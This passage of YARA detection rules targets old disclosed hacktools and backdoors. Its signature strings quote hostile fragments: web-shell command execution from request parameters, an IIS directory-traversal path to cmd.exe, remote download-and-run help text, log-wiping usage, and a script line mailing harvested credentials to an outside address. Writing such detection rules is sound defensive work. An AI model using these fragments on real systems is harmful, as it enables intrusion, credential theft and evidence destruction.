"Disclosed hacktool set (old stuff) - file aspfile2.asp" author = "Florian Roth" date = "23.11.14" score = 60 hash = "14efbc6cb01b809ad75a535d32b9da4df517ff29" strings: $s0 = "response.write \"command completed success!\" " fullword ascii $s1 = "for each co in foditems " fullword ascii $s3 = "<input type=text name=text6 value=\"<%= szCMD6 %>\"><br> " fullword ascii $s19 = "<title>Hello! Welcome </title>" fullword ascii condition: all of them } rule UnPack_rar_Folder_InjectT { meta: description = "Disclosed hacktool set (old stuff) - file InjectT.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "80f39e77d4a34ecc6621ae0f4d5be7563ab27ea6" strings: $s0 = "%s -Install -->To Install The Service" fullword ascii $s1 = "Explorer.exe" fullword ascii $s2 = "%s -Start -->To Start The Service" fullword ascii $s3 = "%s -Stop -->To Stop The Service" fullword ascii $s4 = "The Port Is Out Of Range" fullword ascii $s7 = "Fail To Set The Port" fullword ascii $s11 = "\\psapi.dll" fullword ascii $s20 = "TInject.Dll" fullword ascii $x1 = "Software\\Microsoft\\Internet Explorer\\WinEggDropShell" fullword ascii $x2 = "injectt.exe" fullword ascii condition: ( 1 of ($x*) ) and ( 3 of ($s*) ) } rule Jc_WinEggDrop_Shell { meta: description = "Disclosed hacktool set (old stuff) - file Jc.WinEggDrop Shell.txt" author = "Florian Roth" date = "23.11.14" score = 60 hash = "820674b59f32f2cf72df50ba4411d7132d863ad2" strings: $s0 = "Sniffer.dll" fullword ascii $s4 = ":Execute net.exe user Administrator pass" fullword ascii $s5 = "Fport.exe or mport.exe " fullword ascii $s6 = ":Password Sniffering Is Running |Not Running " fullword ascii $s9 = ": The Terminal Service Port Has Been Set To NewPort" fullword ascii $s15 = ": Del www.exe " fullword ascii $s20 = ":Dir *.exe " fullword ascii condition: 2 of them } rule aspbackdoor_asp1 { meta: description = "Disclosed hacktool set (old stuff) - file asp1.txt" author = "Florian Roth" date = "23.11.14" score = 60 hash = "9ef9f34392a673c64525fcd56449a9fb1d1f3c50" strings: $s0 = "param = \"driver={Microsoft Access Driver (*.mdb)}\" " fullword ascii $s1 = "conn.Open param & \";dbq=\" & Server.MapPath(\"scjh.mdb\") " fullword ascii $s6 = "set rs=conn.execute (sql)%> " fullword ascii $s7 = "<%set Conn = Server.CreateObject(\"ADODB.Connection\") " fullword ascii $s10 = "<%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh " fullword ascii $s15 = "sql=\"select * from scjh\" " fullword ascii condition: all of them } rule QQ_zip_Folder_QQ { meta: description = "Disclosed hacktool set (old stuff) - file QQ.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "9f8e3f40f1ac8c1fa15a6621b49413d815f46cfb" strings: $s0 = "EMAIL:haoq@neusoft.com" fullword wide $s1 = "EMAIL:haoq@neusoft.com" fullword wide $s4 = "QQ2000b.exe" fullword wide $s5 = "haoq@neusoft.com" fullword ascii $s9 = "QQ2000b.exe" fullword ascii $s10 = "\\qq2000b.exe" fullword ascii $s12 = "WINDSHELL STUDIO[WINDSHELL " fullword wide $s17 = "SOFTWARE\\HAOQIANG\\" fullword ascii condition: 5 of them } rule UnPack_rar_Folder_TBack { meta: description = "Disclosed hacktool set (old stuff) - file TBack.DLL" author = "Florian Roth" date = "23.11.14" score = 60 hash = "30fc9b00c093cec54fcbd753f96d0ca9e1b2660f" strings: $s0 = "Redirect SPort RemoteHost RPort -->Port Redirector" fullword ascii $s1 = "http://IP/a.exe a.exe -->Download A File" fullword ascii $s2 = "StopSniffer -->Stop Pass Sniffer" fullword ascii $s3 = "TerminalPort Port -->Set New Terminal Port" fullword ascii $s4 = "Example: Http://12.12.12.12/a.exe abc.exe" fullword ascii $s6 = "Create Password Sniffering Thread Successfully. Status:Logging" fullword ascii $s7 = "StartSniffer NIC -->Start Sniffer" fullword ascii $s8 = "Shell -->Get A Shell" fullword ascii $s11 = "DeleteService ServiceName -->Delete A Service" fullword ascii $s12 = "Disconnect ThreadNumber|All -->Disconnect Others" fullword ascii $s13 = "Online -->List All Connected IP" fullword ascii $s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword ascii $s16 = "Example: Set REG_SZ Test Trojan.exe" fullword ascii $s18 = "Execute Program -->Execute A Program" fullword ascii $s19 = "Reboot -->Reboot The System" fullword ascii $s20 = "Password Sniffering Is Not Running" fullword ascii condition: 4 of them } rule sig_238_cmd_2 { meta: description = "Disclosed hacktool set (old stuff) - file cmd.jsp" author = "Florian Roth" date = "23.11.14" score = 60 hash = "be4073188879dacc6665b6532b03db9f87cfc2bb" strings: $s0 = "Process child = Runtime.getRuntime().exec(" ascii $s1 = "InputStream in = child.getInputStream();" fullword ascii $s2 = "String cmd = request.getParameter(\"" ascii $s3 = "while ((c = in.read()) != -1) {" fullword ascii $s4 = "<%@ page import=\"java.io.*\" %>" fullword ascii condition: all of them } rule RangeScan { meta: description = "Disclosed hacktool set (old stuff) - file RangeScan.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "bace2c65ea67ac4725cb24aa9aee7c2bec6465d7" strings: $s0 = "RangeScan.EXE" fullword wide $s4 = "<br><p align=\"center\"><b>RangeScan " fullword ascii $s9 = "Produced by isn0" fullword ascii $s10 = "RangeScan" fullword wide $s20 = "%d-%d-%d %d:%d:%d" fullword ascii condition: 3 of them } rule XYZCmd_zip_Folder_Readme { meta: description = "Disclosed hacktool set (old stuff) - file Readme.txt" author = "Florian Roth" date = "23.11.14" score = 60 hash = "967cb87090acd000d22e337b8ce4d9bdb7c17f70" strings: $s3 = "3.xyzcmd \\\\RemoteIP /user:Administrator /pwd:1234 /nowait trojan.exe" fullword ascii $s20 = "XYZCmd V1.0" fullword ascii condition: all of them } rule ByPassFireWall_zip_Folder_Inject { meta: description = "Disclosed hacktool set (old stuff) - file Inject.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "34f564301da528ce2b3e5907fd4b1acb7cb70728" strings: $s6 = "Fail To Inject" fullword ascii $s7 = "BtGRemote Pro; V1.5 B/{" fullword ascii $s11 = " Successfully" fullword ascii condition: all of them } rule sig_238_sqlcmd { meta: description = "Disclosed hacktool set (old stuff) - file sqlcmd.exe" author = "Florian Roth" date = "23.11.14" score = 40 hash = "b6e356ce6ca5b3c932fa6028d206b1085a2e1a9a" strings: $s0 = "Permission denial to EXEC command.:(" fullword ascii $s3 = "by Eyas<cooleyas@21cn.com>" fullword ascii $s4 = "Connect to %s MSSQL server success.Enjoy the shell.^_^" fullword ascii $s5 = "Usage: %s <host> <uid> <pwd>" fullword ascii $s6 = "SqlCmd2.exe Inside Edition." fullword ascii $s7 = "Http://www.patching.net 2000/12/14" fullword ascii $s11 = "Example: %s 192.168.0.1 sa \"\"" fullword ascii condition: 4 of them } rule ASPack_ASPACK { meta: description = "Disclosed hacktool set (old stuff) - file ASPACK.EXE" author = "Florian Roth" date = "23.11.14" score = 60 hash = "c589e6fd48cfca99d6335e720f516e163f6f3f42" strings: $s0 = "ASPACK.EXE" fullword wide $s5 = "CLOSEDFOLDER" fullword wide $s10 = "ASPack compressor" fullword wide condition: all of them } rule sig_238_2323 { meta: description = "Disclosed hacktool set (old stuff) - file 2323.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "21812186a9e92ee7ddc6e91e4ec42991f0143763" strings: $s0 = "port - Port to listen on, defaults to 2323" fullword ascii $s1 = "Usage: srvcmd.exe [/h] [port]" fullword ascii $s3 = "Failed to execute shell" fullword ascii $s5 = "/h - Hide Window" fullword ascii $s7 = "Accepted connection from client at %s" fullword ascii $s9 = "Error %d: %s" fullword ascii condition: all of them } rule Jc_ALL_WinEggDropShell_rar_Folder_Install_2 { meta: description = "Disclosed hacktool set (old stuff) - file Install.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "95866e917f699ee74d4735300568640ea1a05afd" strings: $s1 = "http://go.163.com/sdemo" fullword wide $s2 = "Player.tmp" fullword ascii $s3 = "Player.EXE" fullword wide $s4 = "mailto:sdemo@263.net" fullword ascii $s5 = "S-Player.exe" fullword ascii $s9 = "http://www.BaiXue.net (" fullword wide condition: all of them } rule sig_238_TFTPD32 { meta: description = "Disclosed hacktool set (old stuff) - file TFTPD32.EXE" author = "Florian Roth" date = "23.11.14" score = 60 hash = "5c5f8c1a2fa8c26f015e37db7505f7c9e0431fe8" strings: $s0 = " http://arm.533.net" fullword ascii $s1 = "Tftpd32.hlp" fullword ascii $s2 = "Timeouts and Ports should be numerical and can not be 0" fullword ascii $s3 = "TFTPD32 -- " fullword wide $s4 = "%d -- %s" fullword ascii $s5 = "TIMEOUT while waiting for Ack block %d. file <%s>" fullword ascii $s12 = "TftpPort" fullword ascii $s13 = "Ttftpd32BackGround" fullword ascii $s17 = "SOFTWARE\\TFTPD32" fullword ascii condition: all of them } rule sig_238_iecv { meta: description = "Disclosed hacktool set (old stuff) - file iecv.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "6e6e75350a33f799039e7a024722cde463328b6d" strings: $s1 = "Edit The Content Of Cookie " fullword wide $s3 = "Accessories\\wordpad.exe" fullword ascii $s4 = "gorillanation.com" fullword ascii $s5 = "Before editing the content of a cookie, you should close all windows of Internet" ascii $s12 = "http://nirsoft.cjb.net" fullword ascii condition: all of them } rule Antiy_Ports_1_21 { meta: description = "Disclosed hacktool set (old stuff) - file Antiy Ports 1.21.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "ebf4bcc7b6b1c42df6048d198cbe7e11cb4ae3f0" strings: $s0 = "AntiyPorts.EXE" fullword wide $s7 = "AntiyPorts MFC Application" fullword wide $s20 = " @Stego:" fullword ascii condition: all of them } rule perlcmd_zip_Folder_cmd { meta: description = "Disclosed hacktool set (old stuff) - file cmd.cgi" author = "Florian Roth" date = "23.11.14" score = 60 hash = "21b5dc36e72be5aca5969e221abfbbdd54053dd8" strings: $s0 = "syswrite(STDOUT, \"Content-type: text/html\\r\\n\\r\\n\", 27);" fullword ascii $s1 = "s/%20/ /ig;" fullword ascii $s2 = "syswrite(STDOUT, \"\\r\\n</PRE></HTML>\\r\\n\", 17);" fullword ascii $s4 = "open(STDERR, \">&STDOUT\") || die \"Can't redirect STDERR\";" fullword ascii $s5 = "$_ = $ENV{QUERY_STRING};" fullword ascii $s6 = "$execthis = $_;" fullword ascii $s7 = "system($execthis);" fullword ascii $s12 = "s/%2f/\\//ig;" fullword ascii condition: 6 of them } rule aspbackdoor_asp3 { meta: description = "Disclosed hacktool set (old stuff) - file asp3.txt" author = "Florian Roth" date = "23.11.14" score = 60 hash = "e5588665ca6d52259f7d9d0f13de6640c4e6439c" strings: $s0 = "<form action=\"changepwd.asp\" method=\"post\"> " fullword ascii $s1 = " Set oUser = GetObject(\"WinNT://ComputerName/\" & UserName) " fullword ascii $s2 = " value=\"<%=Request.ServerVariables(\"LOGIN_USER\")%>\"> " fullword ascii $s14 = " Windows NT " fullword ascii $s16 = " WIndows 2000 " fullword ascii $s18 = "OldPwd = Request.Form(\"OldPwd\") " fullword ascii $s19 = "NewPwd2 = Request.Form(\"NewPwd2\") " fullword ascii $s20 = "NewPwd1 = Request.Form(\"NewPwd1\") " fullword ascii condition: all of them } rule sig_238_FPipe { meta: description = "Disclosed hacktool set (old stuff) - file FPipe.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c" strings: $s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii $s1 = "Unable to resolve hostname \"%s\"" fullword ascii $s2 = "source port for that outbound connection being set to 53 also." fullword ascii $s3 = " -s - outbound source port number" fullword ascii $s5 = "http://www.foundstone.com" fullword ascii $s20 = "Attempting to connect to %s port %d" fullword ascii condition: all of them } rule sig_238_concon { meta: description = "Disclosed hacktool set (old stuff) - file concon.com" author = "Florian Roth" date = "23.11.14" score = 60 hash = "816b69eae66ba2dfe08a37fff077e79d02b95cc1" strings: $s0 = "Usage: concon \\\\ip\\sharename\\con\\con" fullword ascii condition: all of them } rule aspbackdoor_regdll { meta: description = "Disclosed hacktool set (old stuff) - file regdll.asp" author = "Florian Roth" date = "23.11.14" score = 60 hash = "5c5e16a00bcb1437bfe519b707e0f5c5f63a488d" strings: $s1 = "exitcode = oShell.Run(\"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, " ascii $s3 = "oShell.Run \"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, False" fullword ascii $s4 = "EchoB(\"regsvr32.exe exitcode = \" & exitcode)" fullword ascii $s5 = "Public Property Get oFS()" fullword ascii condition: all of them } rule CleanIISLog { meta: description = "Disclosed hacktool set (old stuff) - file CleanIISLog.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "827cd898bfe8aa7e9aaefbe949d26298f9e24094" strings: $s1 = "CleanIP - Specify IP Address Which You Want Clear." fullword ascii $s2 = "LogFile - Specify Log File Which You Want Process." fullword ascii $s8 = "CleanIISLog Ver" fullword ascii $s9 = "msftpsvc" fullword ascii $s10 = "Fatal Error: MFC initialization failed" fullword ascii $s11 = "Specified \"ALL\" Will Process All Log Files." fullword ascii $s12 = "Specified \".\" Will Clean All IP Record." fullword ascii $s16 = "Service %s Stopped." fullword ascii $s20 = "Process Log File %s..." fullword ascii condition: 5 of them } rule sqlcheck { meta: description = "Disclosed hacktool set (old stuff) - file sqlcheck.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "5a5778ac200078b627db84fdc35bf5bcee232dc7" strings: $s0 = "Power by eyas<cooleyas@21cn.com>" fullword ascii $s3 = "\\ipc$ \"\" /user:\"\"" fullword ascii $s4 = "SQLCheck can only scan a class B network. Try again." fullword ascii $s14 = "Example: SQLCheck 192.168.0.1 192.168.0.254" fullword ascii $s20 = "Usage: SQLCheck <StartIP> <EndIP>" fullword ascii condition: 3 of them } rule sig_238_RunAsEx { meta: description = "Disclosed hacktool set (old stuff) - file RunAsEx.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "a22fa4e38d4bf82041d67b4ac5a6c655b2e98d35" strings: $s0 = "RunAsEx By Assassin 2000. All Rights Reserved. http://www.netXeyes.com" fullword ascii $s8 = "cmd.bat" fullword ascii $s9 = "Note: This Program Can'nt Run With Local Machine." fullword ascii $s11 = "%s Execute Succussifully." fullword ascii $s12 = "winsta0" fullword ascii $s15 = "Usage: RunAsEx <UserName> <Password> <Execute File> [\"Execute Option\"]" fullword ascii condition: 4 of them } rule sig_238_nbtdump { meta: description = "Disclosed hacktool set (old stuff) - file nbtdump.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "cfe82aad5fc4d79cf3f551b9b12eaf9889ebafd8" strings: $s0 = "Creation of results file - \"%s\" failed." fullword ascii $s1 = "c:\\>nbtdump remote-machine" fullword ascii $s7 = "Cerberus NBTDUMP" fullword ascii $s11 = "<CENTER><H1>Cerberus Internet Scanner</H1>" fullword ascii $s18 = "<P><H3>Account Information</H3><PRE>" fullword wide $s19 = "%s's password is %s</H3>" fullword wide $s20 = "%s's password is blank</H3>" fullword wide condition: 5 of them } rule sig_238_Glass2k { meta: description = "Disclosed hacktool set (old stuff) - file Glass2k.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "b05455a1ecc6bc7fc8ddef312a670f2013704f1a" strings: $s0 = "Portions Copyright (c) 1997-1999 Lee Hasiuk" fullword ascii $s1 = "C:\\Program Files\\Microsoft Visual Studio\\VB98" fullword ascii $s3 = "WINNT\\System32\\stdole2.tlb" fullword ascii $s4 = "Glass2k.exe" fullword wide $s7 = "NeoLite Executable File Compressor" fullword ascii condition: all of them } rule SplitJoin_V1_3_3_rar_Folder_3 { meta: description = "Disclosed hacktool set (old stuff) - file splitjoin.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "21409117b536664a913dcd159d6f4d8758f43435" strings: $s2 = "ie686@sohu.com" fullword ascii $s3 = "splitjoin.exe" fullword ascii $s7 = "SplitJoin" fullword ascii condition: all of them } rule aspbackdoor_EDIT { meta: description = "Disclosed hacktool set (old stuff) - file EDIT.ASP" author = "Florian Roth" date = "23.11.14" score = 60 hash = "12196cf62931cde7b6cb979c07bb5cc6a7535cbb" strings: $s1 = "<meta HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html;charset=gb_2312-80\">" fullword ascii $s2 = "Set thisfile = fs.GetFile(whichfile)" fullword ascii $s3 = "response.write \"<a href='index.asp'>" fullword ascii $s5 = "if Request.Cookies(\"password\")=\"juchen\" then " fullword ascii $s6 = "Set thisfile = fs.OpenTextFile(whichfile, 1, False)" fullword ascii $s7 = "color: rgb(255,0,0); text-decoration: underline }" fullword ascii $s13 = "if Request(\"creat\")<>\"yes\" then" fullword ascii condition: 5 of them } rule aspbackdoor_entice { meta: description = "Disclosed hacktool set (old stuff) - file entice.asp" author = "Florian Roth" date = "23.11.14" score = 60 hash = "e273a1b9ef4a00ae4a5d435c3c9c99ee887cb183" strings: $s0 = "<Form Name=\"FormPst\" Method=\"Post\" Action=\"entice.asp\">" fullword ascii $s2 = "if left(trim(request(\"sqllanguage\")),6)=\"select\" then" fullword ascii $s4 = "conndb.Execute(sqllanguage)" fullword ascii $s5 = "<!--#include file=sqlconn.asp-->" fullword ascii $s6 = "rstsql=\"select * from \"&rstable(\"table_name\")" fullword ascii condition: all of them } rule FPipe2_0 { meta: description = "Disclosed hacktool set (old stuff) - file FPipe2.0.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "891609db7a6787575641154e7aab7757e74d837b" strings: $s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii $s1 = "Unable to resolve hostname \"%s\"" fullword ascii $s2 = " -s - outbound connection source port number" fullword ascii $s3 = "source port for that outbound connection being set to 53 also." fullword ascii $s4 = "http://www.foundstone.com" fullword ascii $s19 = "FPipe" fullword ascii condition: all of them } rule InstGina { meta: description = "Disclosed hacktool set (old stuff) - file InstGina.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "5317fbc39508708534246ef4241e78da41a4f31c" strings: $s0 = "To Open Registry" fullword ascii $s4 = "I love Candy very much!!" ascii $s5 = "GinaDLL" fullword ascii condition: all of them } rule ArtTray_zip_Folder_ArtTray { meta: description = "Disclosed hacktool set (old stuff) - file ArtTray.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "ee1edc8c4458c71573b5f555d32043cbc600a120" strings: $s0 = "http://www.brigsoft.com" fullword wide $s2 = "ArtTrayHookDll.dll" fullword ascii $s3 = "ArtTray Version 1.0 " fullword wide $s16 = "TRM_HOOKCALLBACK" fullword ascii condition: all of them } rule sig_238_findoor { meta: description = "Disclosed hacktool set (old stuff) - file findoor.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "cdb1ececceade0ecdd4479ecf55b0cc1cf11cdce" strings: $s0 = "(non-Win32 .EXE or error in .EXE image)." fullword ascii $s8 = "PASS hacker@hacker.com" fullword ascii $s9 = "/scripts/..%c1%1c../winnt/system32/cmd.exe" fullword ascii $s10 = "MAIL FROM:hacker@hacker.com" fullword ascii $s11 = "http://isno.yeah.net" fullword ascii condition: 4 of them } rule aspbackdoor_ipclear { meta: description = "Disclosed hacktool set (old stuff) - file ipclear.vbs" author = "Florian Roth" date = "23.11.14" score = 60 hash = "9f8fdfde4b729516330eaeb9141fb2a7ff7d0098" strings: $s0 = "Set ServiceObj = GetObject(\"WinNT://\" & objNet.ComputerName & \"/w3svc\")" fullword ascii $s1 = "wscript.Echo \"USAGE:KillLog.vbs LogFileName YourIP.\"" fullword ascii $s2 = "Set txtStreamOut = fso.OpenTextFile(destfile, ForWriting, True)" fullword ascii $s3 = "Set objNet = WScript.CreateObject( \"WScript.Network\" )" fullword ascii $s4 = "Set fso = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii condition: all of them } rule WinEggDropShellFinal_zip_Folder_InjectT { meta: description = "Disclosed hacktool set (old stuff) - file InjectT.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "516e80e4a25660954de8c12313e2d7642bdb79dd" strings: $s0 = "Packed by exe32pack" ascii $s1 = "2TInject.Dll" fullword ascii $s2 = "Windows Services" fullword ascii $s3 = "Findrst6" fullword ascii $s4 = "Press Any Key To Continue......" fullword ascii condition: all of them } rule sig_238_rshsvc { meta: description = "Disclosed hacktool set (old stuff) - file rshsvc.bat" author = "Florian Roth" date = "23.11.14" score = 60 hash = "fb15c31254a21412aecff6a6c4c19304eb5e7d75" strings: $s0 = "if not exist %1\\rshsetup.exe goto ERROR2" fullword ascii $s1 = "ECHO rshsetup.exe is not found in the %1 directory" fullword ascii $s9 = "REM %1 directory must have rshsetup.exe,rshsvc.exe and rshsvc.dll" fullword ascii $s10 = "copy %1\\rshsvc.exe" fullword ascii $s12 = "ECHO Use \"net start rshsvc\" to start the service." fullword ascii $s13 = "rshsetup %SystemRoot%\\system32\\rshsvc.exe %SystemRoot%\\system32\\rshsvc.dll" fullword ascii $s18 = "pushd %SystemRoot%\\system32" fullword ascii condition: all of them } rule gina_zip_Folder_gina { meta: description = "Disclosed hacktool set (old stuff) - file gina.dll" author = "Florian Roth" date = "23.11.14" score = 60 hash = "e0429e1b59989cbab6646ba905ac312710f5ed30" strings: $s0 = "NEWGINA.dll" fullword ascii $s1 = "LOADER ERROR" fullword ascii $s3 = "WlxActivateUserShell" fullword ascii $s6 = "WlxWkstaLockedSAS" fullword ascii $s13 = "WlxIsLockOk" fullword ascii $s14 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii $s16 = "WlxShutdown" fullword ascii $s17 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii condition: all of them } rule superscan3_0 { meta: description = "Disclosed hacktool set (old stuff) - file superscan3.0.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "a9a02a14ea4e78af30b8b4a7e1c6ed500a36bc4d" strings: $s0 = "\\scanner.ini" fullword ascii $s1 = "\\scanner.exe" fullword ascii $s2 = "\\scanner.lst" fullword ascii $s4 = "\\hensss.lst" fullword ascii $s5 = "STUB32.EXE" fullword wide $s6 = "STUB.EXE" fullword wide $s8 = "\\ws2check.exe" fullword ascii $s9 = "\\trojans.lst" fullword ascii $s10 = "1996 InstallShield Software Corporation" fullword wide condition: all of them } rule sig_238_xsniff { meta: description = "Disclosed hacktool set (old stuff) - file xsniff.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "d61d7329ac74f66245a92c4505a327c85875c577" strings: $s2 = "xsiff.exe -pass -hide -log pass.log" fullword ascii $s3 = "%s - simple sniffer for win2000" fullword ascii $s4 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" fullword ascii $s5 = "HOST: %s USER: %s, PASS: %s" fullword ascii $s7 = "http://www.xfocus.org" fullword ascii $s9 = " -pass : Filter username/password" fullword ascii $s18 = " -udp : Output udp packets" fullword ascii $s19 = "Code by glacier <glacier@xfocus.org>" fullword ascii $s20 = " -tcp : Output tcp packets" fullword ascii condition: 6 of them } rule sig_238_fscan { meta: description = "Disclosed hacktool set (old stuff) - file fscan.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "d5646e86b5257f9c83ea23eca3d86de336224e55" strings: $s0 = "FScan v1.12 - Command line port scanner." fullword ascii $s2 = " -n - no port scanning - only pinging (unless you use -q)" fullword ascii $s5 = "Example: fscan -bp 80,100-200,443 10.0.0.1-10.0.1.200" fullword ascii $s6 = " -z - maximum simultaneous threads to use for scanning" fullword ascii $s12 = "Failed to open the IP list file \"%s\"" fullword ascii $s13 = "http://www.foundstone.com" fullword ascii $s16 = " -p - TCP port(s) to scan (a comma separated list of ports/ranges) " fullword ascii $s18 = "Bind port number out of range. Using system default." fullword ascii $s19 = "fscan.exe" fullword wide condition: 4 of them } rule _iissample_nesscan_twwwscan { meta: description = "Disclosed hacktool set (old stuff) - from files iissample.exe, nesscan.exe, twwwscan.exe" author = "Florian Roth" date = "23.11.14" score = 60 super_rule = 1 hash0 = "7f20962bbc6890bf48ee81de85d7d76a8464b862" hash1 = "c0b1a2196e82eea4ca8b8c25c57ec88e4478c25b" hash2 = "548f0d71ef6ffcc00c0b44367ec4b3bb0671d92f" strings: $s0 = "Connecting HTTP Port - Result: " fullword $s1 = "No space for command line argument vector" fullword $s3 = "Microsoft(July/1999~) http://www.microsoft.com/technet/security/current.asp" fullword $s5 = "No space for copy of command line" fullword $s7 = "- Windows NT,2000 Patch Method - " fullword $s8 = "scanf : floating point formats not linked" fullword $s12 = "hrdir_b.c: LoadLibrary != mmdll borlndmm failed" fullword $s13 = "!\"what?\"" fullword $s14 = "%s Port %d Closed" fullword $s16 = "printf : floating point formats not linked" fullword $s17 = "xxtype.cpp" fullword condition: all of them } rule _FsHttp_FsPop_FsSniffer { meta: description = "Disclosed hacktool set (old stuff) - from files FsHttp.exe, FsPop.exe, FsSniffer.exe" author = "Florian Roth" date = "23.11.14" score = 60 super_rule = 1 hash0 = "9d4e7611a328eb430a8bb6dc7832440713926f5f" hash1 = "ae23522a3529d3313dd883727c341331a1fb1ab9" hash2 = "7ffc496cd4a1017485dfb571329523a52c9032d8" strings: $s0 = "-ERR Invalid Command, Type [Help] For Command List" fullword $s1 = "-ERR Get SMS Users ID Failed" fullword $s2 = "Control Time Out 90 Secs, Connection Closed" fullword $s3 = "-ERR Post SMS Failed" fullword $s4 = "Current.hlt" fullword $s6 = "Histroy.hlt" fullword $s7 = "-ERR Send SMS Failed" fullword $s12 = "-ERR Change Password <New Password>" fullword $s17 = "+OK Send SMS Succussifully" fullword $s18 = "+OK Set New Password: [%s]" fullword $s19 = "CHANGE PASSWORD" fullword condition: all of them } rule Ammyy_Admin_AA_v3 { meta: description = "Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe" author = "Florian Roth" reference = "http://goo.gl/gkAg2E" date = "2014/12/22" score = 55 hash1 = "b130611c92788337c4f6bb9e9454ff06eb409166" hash2 = "07539abb2623fe24b9a05e240f675fa2d15268cb" strings: $x1 = "S:\\Ammyy\\sources\\target\\TrService.cpp" fullword ascii $x2 = "S:\\Ammyy\\sources\\target\\TrDesktopCopyRect.cpp" fullword ascii $x3 = "Global\\Ammyy.Target.IncomePort" fullword ascii $x4 = "S:\\Ammyy\\sources\\target\\TrFmFileSys.cpp" fullword ascii $x5 = "Please enter password for accessing remote computer" fullword ascii $s1 = "CreateProcess1()#3 %d error=%d" fullword ascii $s2 = "CHttpClient::SendRequest2(%s, %s, %d) error: invalid host name." fullword ascii $s3 = "ERROR: CreateProcessAsUser() error=%d, session=%d" fullword ascii $s4 = "ERROR: FindProcessByName('explorer.exe')" fullword ascii condition: 2 of ($x*) or all of ($s*) } /* Other dumper and custom hack tools */ rule LinuxHacktool_eyes_screen { meta: description = "Linux hack tools - file screen" author = "Florian Roth" reference = "not set" date = "2015/01/19" hash = "a240a0118739e72ff89cefa2540bf0d7da8f8a6c" strings: $s0 = "or: %s -r [host.tty]" fullword ascii $s1 = "%s: process: character, ^x, or (octal) \\032 expected." fullword ascii $s2 = "Type \"screen [-d] -r [pid.]tty.host\" to resume one of them." fullword ascii $s6 = "%s: at [identifier][%%|*|#] command [args]" fullword ascii $s8 = "Slurped only %d characters (of %d) into buffer - try again" fullword ascii $s11 = "command from %s: %s %s" fullword ascii $s16 = "[ Passwords don't match - your armor crumbles away ]" fullword ascii $s19 = "[ Passwords don't match - checking turned off ]" fullword ascii condition: all of them } rule LinuxHacktool_eyes_scanssh { meta: description = "Linux hack tools - file scanssh" author = "Florian Roth" reference = "not set" date = "2015/01/19" hash = "467398a6994e2c1a66a3d39859cde41f090623ad" strings: $s0 = "Connection closed by remote host" fullword ascii $s1 = "Writing packet : error on socket (or connection closed): %s" fullword ascii $s2 = "Remote connection closed by signal SIG%s %s" fullword ascii $s4 = "Reading private key %s failed (bad passphrase ?)" fullword ascii $s5 = "Server closed connection" fullword ascii $s6 = "%s: line %d: list delimiter not followed by keyword" fullword ascii $s8 = "checking for version `%s' in file %s required by file %s" fullword ascii $s9 = "Remote host closed connection" fullword ascii $s10 = "%s: line %d: bad command `%s'" fullword ascii $s13 = "verifying that server is a known host : file %s not found" fullword ascii $s14 = "%s: line %d: expected service, found `%s'" fullword ascii $s15 = "%s: line %d: list delimiter not followed by domain" fullword ascii $s17 = "Public key from server (%s) doesn't match user preference (%s)" fullword ascii condition: all of them } rule LinuxHacktool_eyes_pscan2 { meta: description = "Linux hack tools - file pscan2" author = "Florian Roth" reference = "not set" date = "2015/01/19" hash = "56b476cba702a4423a2d805a412cae8ef4330905" strings: $s0 = "# pscan completed in %u seconds. (found %d ips)" fullword ascii $s1 = "Usage: %s <b-block> <port> [c-block]" fullword ascii $s3 = "%s.%d.* (total: %d) (%.1f%% done)" fullword ascii $s8 = "Invalid IP." fullword ascii $s9 = "# scanning: " fullword ascii $s10 = "Unable to allocate socket." fullword ascii condition: 2 of them } rule LinuxHacktool_eyes_a { meta: description = "Linux hack tools - file a" author = "Florian Roth" reference = "not set" date = "2015/01/19" hash = "458ada1e37b90569b0b36afebba5ade337ea8695" strings: $s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii $s1 = "mv scan.log bios.txt" fullword ascii $s2 = "rm -rf bios.txt" fullword ascii $s3 = "echo -e \"# by Eyes.\"" fullword ascii $s4 = "././pscan2 $1 22" fullword ascii $s10 = "echo \"#cautam...\"" fullword ascii condition: 2 of them } rule LinuxHacktool_eyes_mass { meta: description = "Linux hack tools - file mass" author = "Florian Roth" reference = "not set" date = "2015/01/19" hash = "2054cb427daaca9e267b252307dad03830475f15" strings: $s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii $s1 = "echo -e \"${BLU}Private Scanner By Raphaello , DeMMoNN , tzepelush & DraC\\n\\r" ascii $s3 = "killall -9 